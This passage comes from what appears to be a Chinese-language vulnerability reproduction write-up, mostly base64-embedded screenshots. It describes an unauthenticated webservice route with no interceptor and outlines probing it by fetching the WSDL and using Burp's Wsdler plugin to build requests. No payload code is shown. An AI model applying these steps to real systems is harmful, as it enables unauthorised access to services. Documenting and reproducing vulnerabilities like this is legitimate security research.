QEOIi/KyIuM0SyfpIUQw27b/auMvIAkIA4LBoqm283Kj4rfHR+UECg1FbZbAYCAKA7OSFb8b7ISRcEBe3gKjL9cN/Q8rauAHxq4LhdJv8lH34YAHEyvXOpEjJNkn04kCBStvXzHpJCwCANcttvNyY+G2SmIX+ArNRXeskCIHZYjFJv997psXM0sBDURQ1+VBa5rypzgNFURT1wKGvHKUoiqKmAA0/FEVR1BSg4YeiKIqaAjT8UBRFUVOAhh+KoihqCtDwQ1EURU2BCYYfUVjY5OaDoiiKeqDQ1g9FURQ1BWj4oSiKoqYADT8UdacwcfOLMsQ8OmU7RY1mcibbfnAQ/6SduZJwhACgo63q+Q46C8M9jUjWv/x8YTBCAKA68uZfjqjuXtI4YMHKTXnmL89K716iQKsoNX3Q8HOLzJ0vn1NwIPDp3Fnxt7gp8Y19I0tcV1+z0zL9XmOKQjKWlZZkJUYG+mCrtlNedeDgmQ5bcP72lzYGVP3l3X2dhEGESdr48guprZ/8+et6J4OIX/6zv9wYP+Rl4aRn31vvHjUwiPhI8tesnZ8eGywAh1HVLj117EiNyn0HiqX7yP976wwHJMte3BZxi5uS8MJnnprTvvOdSuVEMsYkFOclqM+9W3u3p+p4UKsoNe1M1/BDwC9pbqL5olTtcbLtSYfArXK4CRZM5JaS4Uf58lsmPU+TBEVmz+E1X+qwwE2XSxK84Icvbo5UnTy4a0+v1UecljcvOoQLHaA/s+/EvBeXrFtw5r0qI4gK184VyL/dX+8csoeW/f9ZXo+v/eMwGhhEcMD8R59bGXb10J6/Nus5wZKMxQUF2bLaQ53uyT8obDX0WwkOckygA4wfGBLi18vxtMpY9ZBgYW7xQh/Z7rPKu93D/WBWUWo6mn7hh2DwleSt3rhqdoj6sKJOrQQAIOCzPDl1mzgwkkv0DmuDsuOTTo0C0MD6CREpP0qMSBUwVpuuoln+Wb9zoPrOScl7PVaAtY2PNpMX0hMX+QsEmoa1dSrCjXq9II3XcvrlHhcAEMz9QU7+Y876rfVqz3eyY6VFcNBLBTmlfAQAW+aXbAHAatlGaa/X++LC1KKfkcY/WMOeixXFcdxXFbLft+iMDAIAv+D4XyRFzhAKhIRVGZWfNbWcdAAAkPDMijj7R5bQR8W8zs6rx4SJT4u4rR1X/q3DhBk0dg5RbEbxmqWb51fvK6+oUjqGNFkwN2v1uhRH1d8+3jswXbqqt1UKAAxCAMrKb8/l/HjJyoyLe7krC6O6j751efiNs8ui6e8fce2PT0rk688ePd3YBQAqZbv8/NAyZMQ5G9aVzIkN5tk1V2sq9hyVGwfOV9KGV59ZFIiv7nn9e7J6y7K06CB+467f7qghwkVP/3Iz9+AfPzxlBACC/QteeHWJ6fPXP7+CvZyv0dMiOGnj/31hvj8CgIIfv1kAgOW7f/fxuaF7G7UeXofilhbM0F/4yyXH4Ca0it65KkpNUxOc70coFNqsU9CnTHjRuRuefnz9bH7b4a927K7TXfs8IibrDQnnmKz+3U7lJQsb7cfINCYTQgAgDJ35dkZIW2vjO+29TSj8hyliR1+vnEUAoDWozuPg0lBhWpjIqZQfYkWpbuVunQNYqyAwbo3QsVdpdCAE3IhnZoS0tsuP26/nw2exJCrc1LPXMGw6ojHTIk6ZWrlfx+SJ+SekF15r7S5TGw3juB+PD4svEYemsL0fXm07B6ItcaHOPoXUjQDASZCPQ1vW0blPbRFFJD4e7KpQGu0IgZ/4idgwjqbxPYP/IwmR/L7Gv5oCHo3mXezqVyM0Vg4RAkPL+cudEL+otLQw3cfU2dFrvjbJHiezZMtcVL37UIv55hwiMHRqQxaunBcTmZrGufDF7ivm6+0AviS3MM0tOyztHXEWXaJZ+RkJYRydoldjcg9vNwhSH35+a7Ly6N/LD53r5mQsX5vtqr3QbUcAYOiqlbsT5qWIY9NT3Ze+ueJKi7HWnJb3g1PLTVgyP1xfVdPpRgiEucvXJimP7q7XDBYxCUkrmhfUc/Z8m2VcaRFjV31NdSsvPdtPuvPPXx86dba2zea+ccLGqofXlmKfOQ9ty+g/uOtkj3uw75FW0TtYRanpadqMfCOYCc1c/8//52er4/tPfvyn93ed6BpyJQ
|
|||
|
|
<p blockindex=36>此时路由并没有配置拦截器可以未授权访问。</p>
|
|||
|
|
<p blockindex=37><img src=data:image/png;base64,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
|
|||
|
|
<h3 blockindex=38>2、漏洞复现</h3>
|
|||
|
|
<p blockindex=39>我们利用burp中的插件Wsdler帮助我们生成webservice的xml格式</p>
|
|||
|
|
<p blockindex=40>首先访问该seervice的wsdl</p>
|
|||
|
|
<p blockindex=41><img src="data:image/png;base64,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
|
|||
|
|
<p blockindex=42>随后burp抓取该请求包,并parse wsdl</p>
|
|||
|
|
<p blockindex=43><img src="data:image/png;base64,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
|
|||
|
|
<p blockindex=44>随后在插件中得到请求格式</p>
|
|||
|
|
<p blockindex=45><img src="data:image/png;base64,iVBORw0KGgoAAAANSUhEUgAAA6YAAAODCAIAAAAggYs5AAAgAElEQVR4nOzde1xUdf748c+ksLtlW2sr1qa7g4AhiOKtAKG8gaF4ybRSKy1Z0drVvKSWmppXjLzQZmqYupVousWvBQnvXy9Abm4lXghQ1sBUTM0UTAY9vz8OHA4zc87MIDdPr+ejx+7xcz7n8/mczznzmfd8zmcGk8ViEQAAAIBx3VHfDQAAAABqFyEvAAAADM7lkFdKG+vm5jY2TdLNMDZN0sxQJXPe8jC3sOV5mpnTxrq5hS3PqyhNylseVrV2uTb7hVc0RbPkcs62VovDswAAAEA9cjnk3ZaUEBQUlJC0rTZaYytiYLTIzD6h/PtEdqYQSu2SlJd9RAT5erlUpiTlLQ9zixLJFovFYrGUlg5MeqmOTsd5bm5udrcBAADgKtdCXilv+byE6BlrBwclJN3izKjM5D1+n2XfeG+TZg4v36DKELc84BZHssvnfU+kbMkMGtzXtZBXiBPZmUFxkyLK22Dq/d57vavReIXjs3CRHOOq/xcAAADV5lrIeyJlS2b0wAivvoOrzvPKSwhkLyUpiXnLw9zGpim7xqap8snrDZQlARWZ85aHyfsr1gl49R0cJI5knxAVc7ptBw8OytySIk/8nshWIl51G6ouZthmL109dWz/RMpbWOUsxs6vuo5Cbn5u7jL1wgblHJQlE9pts0/5GQ053uVXNQAAAG6FCyGvJOXJEa/J5N13cFDCvPi88nguL/7RqCNxxy0WS2npcd8jCeqjEqKSBpaWlpYejwtKiHJ3TxpYarFYjscFJUS9ZDtPnBD1glhbarFYkqMzJ78QnydJcl2ZW1LyJKk84h7Xd3BQecC6LSlBtPX1NpmqtOF43JGoR5UAVG6AxWIpTY5OiHp0eZ5kMvWeFBeUEOVutQjYiULee31gtKiY4ZaktLcnZ0bPGOdtqpzfTRvr1mZy22S5xuO+2dv0itVBmAsAAFBTXJnlLZ/jFUKee1WmWrfJgZ+XEMJk8h43I1p9UHTyit4mkxy5iorVBKqp2yqC4tbKywMiJsVVhLXCy7dt+ZzsiezM6IG9Td6+bUVC0jZ50re8Qao2VG1ceQNE1UK9x+8rLU2OToiS513Lq9cuJChukqqQihnubUkJlesjhChf+BEUd7y8RpP3+PG9TTrF6mAtLwAAQE1xIeTd9vbkTJEQ5e7u5ubm3mZypigP3U44/w2ytr7qCVF7++0VEzEwWiQkbRPbkhLkeiIGRosj2SdUIfiJ7CNCaZt7m8mZmlUogbbJ1Ps9i6U88A1bnidJOoUoDSuf4U7aJuSId3DfKmd0IjvT5iScb5tCWc/AXC8AAMCtczbk